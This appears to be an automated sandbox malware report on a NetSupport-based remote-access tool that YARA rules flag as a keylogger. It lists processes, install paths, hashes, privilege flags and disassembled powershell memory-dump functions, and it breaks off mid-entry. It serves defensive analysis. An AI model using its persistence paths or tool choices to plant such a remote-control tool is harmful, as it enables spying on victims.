Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:01:12
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Roaming\SysHelper\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
Imagebase:	0x400000
File size:	121'304 bytes
MD5 hash:	4F2D0F4A5BA798FA9E85379C7C4BD36E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000000.2061459893.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3638481461.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3639184086.0000000002572000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	14:01:21
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Roaming\SysHelper\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
Imagebase:	0x800000
File size:	121'304 bytes
MD5 hash:	4F2D0F4A5BA798FA9E85379C7C4BD36E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.2158956147.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2160400872.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:01:30
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Roaming\SysHelper\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
Imagebase:	0x400000
File size:	121'304 bytes
MD5 hash:	4F2D0F4A5BA798FA9E85379C7C4BD36E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2248759340.0000000000708000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.2240623467.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2248546826.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Function 07675D0A Relevance: 6.5, Strings: 5, Instructions: 285COMMON

Download Yara Rule

Strings

Hbq, xrefs: 07675E24
Hbq, xrefs: 07675E93
Hbq, xrefs: 07675E46
TJcq, xrefs: 07675F4F
Te^q, xrefs: 07675EDC

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$TJcq$Te^q
API String ID: 0-2196417943
Opcode ID: 641136b044416c70d722070dba8c95d11401da8267d811a0b09e997c0406eefa
Instruction ID: 880a71736291fc67c58874e014a73ef5cd4da247aecbdd480380493a735cd558
Opcode Fuzzy Hash: 641136b044416c70d722070dba8c95d11401da8267d811a0b09e997c0406eefa
Instruction Fuzzy Hash: A6B19974A006418FCB18DF3AC594AAEBBF6BF85340F148569D4478B3A1DF35E94ACB81

Function 078007F8 Relevance: 11.6, Strings: 9, Instructions: 319COMMON

Download Yara Rule

Strings

,etq, xrefs: 07800AFC
$^q, xrefs: 07800AB4
$^q, xrefs: 078008BB
$^q, xrefs: 07800893
$^q, xrefs: 07800AA4
$^q, xrefs: 078008AF
4'^q, xrefs: 078008DE
4'^q, xrefs: 078008D2
$^q, xrefs: 07800A55

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: ,etq$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1206794132
Opcode ID: 55c1bd20df044185497f316490246269764f1b1b17f6dd18256c05c64a7fe54c
Instruction ID: 4471f6b66c72b2b08301b0b5fa19b1b18e576f299ef34e3ec44d5dd2dca308fb
Opcode Fuzzy Hash: 55c1bd20df044185497f316490246269764f1b1b17f6dd18256c05c64a7fe54c
Instruction Fuzzy Hash: 58B118B1B04209DFDB549F69DC54BAABBE2FF95210F1484AAD409CF291DB31C944C7D1

Function 07809020 Relevance: 6.8, Strings: 5, Instructions: 580COMMON

Download Yara Rule

Strings

4'^q, xrefs: 078094B8
4'^q, xrefs: 07809368
4'^q, xrefs: 078094C2
U, xrefs: 07809685
4'^q, xrefs: 0780935E

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$U
API String ID: 0-3478104857
Opcode ID: 8e8c6cbe94e3a541d455b4331190f7e0e47b345b808fb248599989998f65f6ad
Instruction ID: c8915b565d80e937f6f3eeeabc0371928aa479aad1309cad9c165c005444a2af
Opcode Fuzzy Hash: 8e8c6cbe94e3a541d455b4331190f7e0e47b345b808fb248599989998f65f6ad
Instruction Fuzzy Hash: 4E1247B1B042168FCB558F689C1076BBBA2AFE2314F1480BAD505CB2D2EF36D941C7E1

Function 07806758 Relevance: 4.6, Strings: 3, Instructions: 900COMMON

Download Yara Rule

Strings

$^q, xrefs: 07806A1A
$^q, xrefs: 07806A26
$^q, xrefs: 078069D4

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: d99f47c44594bf2329baff5afac72e1bed47aa69ae8482fba13daf84695bbd3c
Instruction ID: 8cd7d70038737d4f9fb353f569d3eefc48fe889aaa1ecabdae18f9c8cb066614
Opcode Fuzzy Hash: d99f47c44594bf2329baff5afac72e1bed47aa69ae8482fba13daf84695bbd3c
Instruction Fuzzy Hash: D35218B1B042099FCB549F68DC00AAA7BA2AF95314F14C4AAD405CB3D1EF36DD65C7E1

Function 0767B2A0 Relevance: 4.4, Strings: 3, Instructions: 669COMMON

Download Yara Rule

Strings

(Xcq, xrefs: 0767B42E
LR^q, xrefs: 0767B34D
cXDk^, xrefs: 0767BC5A, 0767BC5F

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q$cXDk^
API String ID: 0-1715424000
Opcode ID: fc508a9d2668d379bed50eaf0f9fe988ed74d40dd869f6ec096428f76562e999
Instruction ID: 5b6119dc972844d53009b8819aaa9641a4378e84247b8de70a745f4c34a0d441
Opcode Fuzzy Hash: fc508a9d2668d379bed50eaf0f9fe988ed74d40dd869f6ec096428f76562e999
Instruction Fuzzy Hash: D7524C74B10218CFDB24DB74D894BAEB7B6AF85300F118199D84A9B394DF34AD85CF92

Function 0767A100 Relevance: 2.9, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

(bq, xrefs: 0767A723
(bq, xrefs: 0767A6F7

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: 6aa32d6863e729dd282858d54d023904b0dc17938f7ce467698deffbf776776b
Instruction ID: 3d9f00e6eccb01bf8f696810be575c573006ff424aa90c5f7fbb67a6aa86a3e2
Opcode Fuzzy Hash: 6aa32d6863e729dd282858d54d023904b0dc17938f7ce467698deffbf776776b
Instruction Fuzzy Hash: 23025DB4A00219DFDB15DFA8D584AAEBBB2BF88350F14C159E816AB355C731ED81CB90

Function 07804D10 Relevance: 2.7, Strings: 2, Instructions: 215COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07804DF9
4'^q, xrefs: 07804E05

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 879390cef06b84a960fd09720136aaf8286940b98955ef8a5083c21cdec57223
Instruction ID: 68f5acc7d75d85bb2b41f893085e86b78bd9db590e1cb6bad3ca9bcd2ca972d5
Opcode Fuzzy Hash: 879390cef06b84a960fd09720136aaf8286940b98955ef8a5083c21cdec57223
Instruction Fuzzy Hash: FA711CF0B402469FCB949F259C04A7A7BA5AFA2254F14807ACA09CB2D5EF36C941C7E1

Function 0767B292 Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

(Xcq, xrefs: 0767B42E
LR^q, xrefs: 0767B34D

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: 5897798e124466af667b6b3e936ba0a392390d1a7f967526a917f764b3fea9f7
Instruction ID: a068c498f46354287fc6327febd8de805369c2678c4a3da7c62ef7fe532f6fe7
Opcode Fuzzy Hash: 5897798e124466af667b6b3e936ba0a392390d1a7f967526a917f764b3fea9f7
Instruction Fuzzy Hash: 40517E74B00214CFDB14CF68C850BADBBB6FF89314F1141A9D54A9B364DB719D81CB91

Function 030B72A8 Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

W, xrefs: 030B74FD

Memory Dump Source

Source File: 00000005.00000002.2134089401.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_30b0000_powershell.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: b66d97ea626fee759031056a435d64fb239b4c4da4685a3cc5418226d3d4b218
Instruction ID: 8bc4a24d7add190f1273f3287e311348035e39b614603a6917f2a54cf39efeb6
Opcode Fuzzy Hash: b66d97ea626fee759031056a435d64fb239b4c4da4685a3cc5418226d3d4b218
Instruction Fuzzy Hash: 1CB16034A05205DFCB15CFA8D484AEEBBF2FF89710B1984A9E445AB362C735ED45CB60

Function 076764F2 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

HIW9dSBb4eh/7UDOrQeyb60g/4ahfH0K7u/jF8lrExyMhdSFoMJ/9c0BRgyJcITcfPT6+eTp4giIGe7yPuncjfsvwLpjaNOCKkcPj4Jtct83gDG/zd9oHcmfe9JKQaGxMz, xrefs: 07676535

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID: HIW9dSBb4eh/7UDOrQeyb60g/4ahfH0K7u/jF8lrExyMhdSFoMJ/9c0BRgyJcITcfPT6+eTp4giIGe7yPuncjfsvwLpjaNOCKkcPj4Jtct83gDG/zd9oHcmfe9JKQaGxMz
API String ID: 0-1043417059
Opcode ID: f5616a66f3890b606f4be9b1492831d8552be4cb7afd200009da000b044e2a69
Instruction ID: f6f63267d95f74ab3e2d80513cabb2434d2405805776610721ea349fe1945208
Opcode Fuzzy Hash: f5616a66f3890b606f4be9b1492831d8552be4cb7afd200009da000b044e2a69
Instruction Fuzzy Hash: BB91B3B8B007518BCB24DF79D16846EB7F6AF897607608A19D8139B394DF38EC05CB91

Function 07676500 Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

HIW9dSBb4eh/7UDOrQeyb60g/4ahfH0K7u/jF8lrExyMhdSFoMJ/9c0BRgyJcITcfPT6+eTp4giIGe7yPuncjfsvwLpjaNOCKkcPj4Jtct83gDG/zd9oHcmfe9JKQaGxMz, xrefs: 07676535

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID: HIW9dSBb4eh/7UDOrQeyb60g/4ahfH0K7u/jF8lrExyMhdSFoMJ/9c0BRgyJcITcfPT6+eTp4giIGe7yPuncjfsvwLpjaNOCKkcPj4Jtct83gDG/zd9oHcmfe9JKQaGxMz
API String ID: 0-1043417059
Opcode ID: dac993cfb20bae874188fe117f9359f11b570137aefc67bed3a671d32cdd16d0
Instruction ID: 89ab6ecace1c88b6f799b58d4dc51ce14272a281a19fc26ffbccdeed3164936f
Opcode Fuzzy Hash: dac993cfb20bae874188fe117f9359f11b570137aefc67bed3a671d32cdd16d0
Instruction Fuzzy Hash: 0B91A2B8B007558BCB24DF79D16846EB7F6AF897607608A18D8139B394DF38EC05CB91

Function 030B8C63 Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

F?p, xrefs: 030B8CC8

Memory Dump Source

Source File: 00000005.00000002.2134089401.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_30b0000_powershell.jbxd

Similarity

API ID:
String ID: F?p
API String ID: 0-2207085408
Opcode ID: 735df9b17dfd9f0d3e3471b07b778e33c21e59d0403001dbf3ae571b68e4bedd
Instruction ID: bb93afe0354951b2542f0a0e339c9eef879c7db4c0c639b085f651e7c61d493c
Opcode Fuzzy Hash: 735df9b17dfd9f0d3e3471b07b778e33c21e59d0403001dbf3ae571b68e4bedd
Instruction Fuzzy Hash: 4D81F5719062D98FD716CB28DDA4BC9BFF1BF42244F0541D7C0449B3A2D6349E4ACBA1

Function 076769E2 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

HIW9dSBb4eh/7UDOrQeyb60g/4ahfH0K7u/jF8lrExyMhdSFoMJ/9c0BRgyJcITcfPT6+eTp4giIGe7yPuncjfsvwLpjaNOCKkcPj4Jtct83gDG/zd9oHcmfe9JKQaGxMz, xrefs: 07676A9F, 07676AAD

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID: HIW9dSBb4eh/7UDOrQeyb60g/4ahfH0K7u/jF8lrExyMhdSFoMJ/9c0BRgyJcITcfPT6+eTp4giIGe7yPuncjfsvwLpjaNOCKkcPj4Jtct83gDG/zd9oHcmfe9JKQaGxMz
API String ID: 0-1043417059
Opcode ID: 2272ccf48f9a66479729de5b1f872cd393b881dfaec4a812fb051fe3dbe9888f
Instruction ID: 3f83fee6e3dbf7e933e1994be6d19076915dc8300ec5ac10dfebb1b8368d5c2a
Opcode Fuzzy Hash: 2272ccf48f9a66479729de5b1f872cd393b881dfaec4a812fb051fe3dbe9888f
Instruction Fuzzy Hash: 39417C757606518FC704CF39D89495ABBF9FF8961031581AAE90ACB772DB71EC00CB90

Function 07809000 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

U, xrefs: 0780901D

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 78484d33658a241a48e7ff73584d67c6cd44decf9c8997783507db95ffcbeff5
Instruction ID: d9c6610373123bb5b1ddcab715981af9056ac4e7e42af3a77a3ea13202894960
Opcode Fuzzy Hash: 78484d33658a241a48e7ff73584d67c6cd44decf9c8997783507db95ffcbeff5
Instruction Fuzzy Hash: 11410BF0B14206CFCB558F288C15A6A7FB2AFA2654F1580A6D404CF2D3DB39E941C7E1

Function 07804CF4 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07804DF9

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: d504c0efa7412141c28af434bf92683259fa038bfe4d1478814695d2f6c94b9c
Instruction ID: 099cdbb2afd0ab7aeef3747cc8b56ff302b486c61ef81b04c048008f2177cad4
Opcode Fuzzy Hash: d504c0efa7412141c28af434bf92683259fa038bfe4d1478814695d2f6c94b9c
Instruction Fuzzy Hash: AD21F2F6A542869FCBE05F259C0537A7BB1AFA3260F054066CE19CB2C5EB35C981C7E1

Function 030B2AA0 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2134089401.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_30b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 545a1c594b9abe034ca02887acb4935ebafc5ea1feb92178899149c91450cc00
Instruction ID: f1f9834c67e344deccdfc7b1058d385fe9b2edf5231f1b243d7d5864ad510fec
Opcode Fuzzy Hash: 545a1c594b9abe034ca02887acb4935ebafc5ea1feb92178899149c91450cc00
Instruction Fuzzy Hash: CB915A70A016498FCB15CF59C4949AAFBF5FF88310B248AA9D815AB365C736FC51CF90

Function 030BF9C0 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2134089401.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_30b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 243b40ead39ab49ac8a17a55bec0cd175c24f30ce76a82c3215f21170a849a99
Instruction ID: 1fea8c0024e7ae0e78a506d50f10811d5ede3310a3ee7ac69d2eb67767599a63
Opcode Fuzzy Hash: 243b40ead39ab49ac8a17a55bec0cd175c24f30ce76a82c3215f21170a849a99
Instruction Fuzzy Hash: E8816D34A012049FDB14DF78D894AAEBBF2FF89304F14856DD456AB3A1DB35AC46CB90

Function 07676E0F Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb34a0515a4daa11776820f7d27b00db253639d32c6365afdcf3557bc828afc
Instruction ID: c588ee11d3d0b39dd443816d42f661e797228c136993437e29bf4b407b17371c
Opcode Fuzzy Hash: 6fb34a0515a4daa11776820f7d27b00db253639d32c6365afdcf3557bc828afc
Instruction Fuzzy Hash: E401F47220D7A08FC7264A30E5442E17FB4DB43275F0C048FD58B8BB52D72AA882C781

Function 07676E2D Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 793070446b6bbacd47739ef5e2c560d8846a2a8b59b44d63d3417b24eba98da4
Instruction ID: 41539e071dd58ad9388c7042c01f1d5a40a7c7ee2c5185df61bbc62566df9cc4
Opcode Fuzzy Hash: 793070446b6bbacd47739ef5e2c560d8846a2a8b59b44d63d3417b24eba98da4
Instruction Fuzzy Hash: EAF0E931108B918FC7268B38C6542E57FA0EF42235B0C06CED4878BF93C739A446C741

Function 030B8D90 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2134089401.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_30b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae3d3e3f4fc1a5b243a41bd893442ef4aca75917ca47683863016d4104c8aa3d
Instruction ID: fd083a6349fb6490d10f102d9b63f29095e8e275fa592462fb52a7db434e3ac3
Opcode Fuzzy Hash: ae3d3e3f4fc1a5b243a41bd893442ef4aca75917ca47683863016d4104c8aa3d
Instruction Fuzzy Hash: EA719F30A052598FDB19CF29C990B9EBBF1FF85300F0581EAD508AB2A1D7349D85CFA1

Function 0767C108 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24664c5d6f8049b94bd13f9c8d8ee865f0c48884b135d6438eb6aaa7fdd259de
Instruction ID: caa9df07e1025bd7e0264a3dd715550122693371ab70ceb754a42e4a8ed7fb99
Opcode Fuzzy Hash: 24664c5d6f8049b94bd13f9c8d8ee865f0c48884b135d6438eb6aaa7fdd259de
Instruction Fuzzy Hash: A3618F75A002089FCB15DF69D9849DEFBF6FF89320B15816AE809A7311D731EC45CBA0

Function 030BF9B3 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2134089401.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_30b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e982de5703fa50cfed91ca291e87da41abd848735172d9987d24682815697eec
Instruction ID: 4c7bc35e2fcd8fdfb1de36508f3ff8eaaac147013cbb1afaf13401fa84dc36ea
Opcode Fuzzy Hash: e982de5703fa50cfed91ca291e87da41abd848735172d9987d24682815697eec
Instruction Fuzzy Hash: A8612B34A016049FDB14EF78D894AAEB7F2BF89304F14896CD456AB364DB35AC49CB50

Function 07676F90 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f961bd4fa6cd28b3c3f06995037a50e1598dcfca6cdf9d7a3187d0045c9afd
Instruction ID: 458ddb3078161732b1563e97d5883c6b924d1f71dd90050546b84b624808b7a7
Opcode Fuzzy Hash: 03f961bd4fa6cd28b3c3f06995037a50e1598dcfca6cdf9d7a3187d0045c9afd
Instruction Fuzzy Hash: B451EF76A00214AFCB16DFB5C85899DBFFAFF89210B1940A9E5068B761DB35DC51CB80

Function 030B8F10 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2134089401.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_30b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7194df1effe61e98a241fe5eb043c86455461591766ac57041ea5533f88eb2df
Instruction ID: 1890e5f5c2618d545da2f817f92db74539ecde82b51ea0178e24b0ae86cda9b1
Opcode Fuzzy Hash: 7194df1effe61e98a241fe5eb043c86455461591766ac57041ea5533f88eb2df
Instruction Fuzzy Hash: BA511830A01214CFEB15DB78C8A4BAD77F6AF89244F2405A9D506EB3A5DF399D81CF60

Function 07676852 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c14797f47c97c45efe8be6050a2cae841377b94d8cacf97146a280016094992
Instruction ID: cb62c063d0069b5e17581547910153b978cd1734c1155942a9d23bc274e4e5c4
Opcode Fuzzy Hash: 5c14797f47c97c45efe8be6050a2cae841377b94d8cacf97146a280016094992
Instruction Fuzzy Hash: F541D7B5B145069FC704CF69D9849AEBBBAFF89311F1181A6E90ADB351C770EC05C7A0

Function 0767AA58 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 960fd83fb1c68460b1e6485d7a9a9abe1cb6b5914f6a2c9897d599e682c5a209
Instruction ID: ac26c7d1d3e367a2883fca97883ddd7b9e7706bae7f4dcc731838395f6d1f38f
Opcode Fuzzy Hash: 960fd83fb1c68460b1e6485d7a9a9abe1cb6b5914f6a2c9897d599e682c5a209
Instruction Fuzzy Hash: D941D3B67501108FCB44DF6CD988A9DB7F5FF88625B2541AAE51ACB372DA31EC00CB50

Function 07677880 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d0daabf90ed544fa084317fbdf4d60b70f309d526e3736b03dec8638d9375a8
Instruction ID: 3780af35e962021e5fb078002fca4238bbcf670277d28ddc70eb84d25cd9c338
